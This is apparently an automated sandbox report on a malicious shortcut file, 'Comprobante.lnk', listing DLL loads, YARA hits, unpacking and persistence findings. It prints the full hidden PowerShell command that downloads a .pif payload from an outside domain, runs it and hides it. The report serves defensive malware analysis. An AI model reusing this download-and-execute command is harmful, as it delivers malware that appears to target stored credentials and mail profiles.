Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\screens.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Comprobante.lnk.lnk

LNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\screens.pif

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\screens.pif

Unpacked PE file: 4.2.screens.pif.b00000.0.unpack j1CM!e^U:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Suspicious powershell command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';

Yara detected aPLib compressed binary

Source: Yara match	File source: 4.2.screens.pif.49889b8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: screens.pif PID: 2208, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: screens.pif PID: 688, type: MEMORYSTR

Source: screens.pif.0.dr	Static PE information: section name: j1CM!e^U
Source: screens.pif.0.dr	Static PE information: section name:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF7C02480FD push ebx; ret	0_2_00007FF7C024816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF7C0310D6C push eax; ret	0_2_00007FF7C0310D6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF7C0312530 pushad ; retf	0_2_00007FF7C0312531
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_00B481B8 pushfd ; ret	4_2_00B481BF
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_00B479E2 push esp; retf	4_2_00B479E8
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D5991C push esp; iretd	4_2_02D5991D
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D51503 push ss; retf	4_2_02D51504
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D59926 push esp; iretd	4_2_02D59927
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_02D51522 push ebp; retf	4_2_02D51523
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE72E9 pushfd ; retf	4_2_0ABE72EA
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE72C0 pushfd ; retf	4_2_0ABE72C1
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE73D9 pushfd ; retf	4_2_0ABE73DB
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE8306 pushfd ; retf	4_2_0ABE832E
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE58E3 push 3000005Eh; ret	4_2_0ABE58F1
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE78DA pushfd ; retf	4_2_0ABE78DB
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE7061 pushfd ; retf	4_2_0ABE7062
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE7983 pushfd ; retf	4_2_0ABE7985
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE7933 pushfd ; retf	4_2_0ABE7935
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE712D pushfd ; retf	4_2_0ABE712F
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE7918 pushfd ; retf	4_2_0ABE791A
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE710F pushfd ; retf	4_2_0ABE7110
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE7968 pushfd ; retf	4_2_0ABE796A
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE714C pushfd ; retf	4_2_0ABE714E
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE6E13 pushfd ; retf	4_2_0ABE6E1E
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE77A3 pushfd ; retf	4_2_0ABE77A4
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE77D3 pushfd ; retf	4_2_0ABE77D5
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE7CAD pushfd ; retf	4_2_0ABE7CAE
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE74DC pushfd ; retf	4_2_0ABE74DD
Source: C:\Users\user\Desktop\screens.pif	Code function: 4_2_0ABE75F8 pushfd ; retf	4_2_0ABE75FA
Source: C:\Users\user\Desktop\screens.pif	Code function: 5_2_00402AC0 push eax; ret	5_2_00402AD4
Source: C:\Users\user\Desktop\screens.pif	Code function: 5_2_00402AC0 push eax; ret	5_2_00402AFC

Source: screens.pif.0.dr

Static PE information: section name: j1CM!e^U entropy: 7.999315698306394

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Drops PE files with a suspicious file extension

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Desktop\screens.pif

Jump to dropped file

Tries to download and execute files (via powershell)

Source: unknown

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\Desktop\screens.pif			Jump to dropped file
Source: C:\Users\user\Desktop\screens.pif	File created: C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
